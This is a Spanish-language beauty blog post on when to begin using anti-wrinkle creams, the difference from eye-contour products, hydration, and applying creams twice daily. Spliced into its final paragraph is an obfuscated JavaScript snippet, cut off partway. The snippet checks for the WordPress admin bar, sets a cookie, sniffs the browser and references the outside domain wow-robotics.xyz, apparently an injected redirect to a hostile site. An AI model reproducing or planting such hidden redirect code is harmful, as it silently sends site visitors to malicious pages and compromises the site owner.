La edad adecuada para utilizar cremas con ingredientes antiarrugas es a partir de los 25/30 años, antes de esa edad bastaría con utilizar hidratantes con factor solar o antioxidantes . Si bien esta edad es orientativa, podríamos necesitar una crema anti-arrugas antes de esa edad siempre y cuando la piel lo necesite, y esto podría deberse a varios factores tales como cambios bruscos de peso, mala alimentación, exceso de sol (tengamos en cuenta que es el causante del 70% del envejecimiento cutáneo), así como problemas en la piel o predisposición genética.

También debemos tener en cuenta que es lo que realmente nos preocupa y queremos mejorar, así mujeres de más de 50 años o más, pueden utilizar una crema hidratante y sentir su piel confortable y no ansiar una crema anti-arrugas, también se puede dar el caso de mujeres muy jóvenes que utilizan cremas reafirmantes o antiarrugas porque en ese momento puntual, su piel las necesita.

Proteger la piel desde la juventud es muy importante para evitar problemas futuros y lucir durante más tiempo una piel radiante, así como evitar las arrugas futuras. Si bien no podremos evitarlas por el paso del tiempo, si que podremos alargar el tiempo en que estas aparecen por primera vez. Es sobre los 25/30 años cuando las primeras arruguitas empiezan a asomar, son lo que llamamos arrugas de expresión, que después, con el paso de los años se pueden convertir en arrugas profundas. Incluso hay pieles donde pueden surgir incluso antes de los 30 (como son las pieles muy secas, donde aparecen con más facilidad debido a la deshidratación).

Es imprescindible que distingamos entre cremas hidratantes faciales y contornos de ojos, ya que estos últimos están formulados especialmente para esa zona. Evitar utilizar cremas antiarrugas en el contorno de los ojos ya que puede ser contra producente. La piel del contorno de los ojos es muy fina, casi 7 veces mas fina que el resto del rostro (por eso a veces surgen ojeras y bolsas debido al mal riego sanguíneo). En esa zona utilizaremos solo y exclusivamente una crema formulada para esa zona.

La hidratación es esencial, ya que una piel que pierde agua debido a la deshidratación tiende a arrugarse con mucha más facilidad. Esta pérdida de elasticidad es inevitable con el tiempo, pero también hay que decir que si es “ralentizable” con el uso de cremas antiarrugas.

Chicas, la constancia una vez que empezamos este tipo de tratamientos es muy importante, así que una vez que hayamos escogido la crema que más se adapta a nuestras necesidades deberemos emplearla con constancia 2 veces al día siempre con la piel limpia y sin restos de maquillaje e impurezas. var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone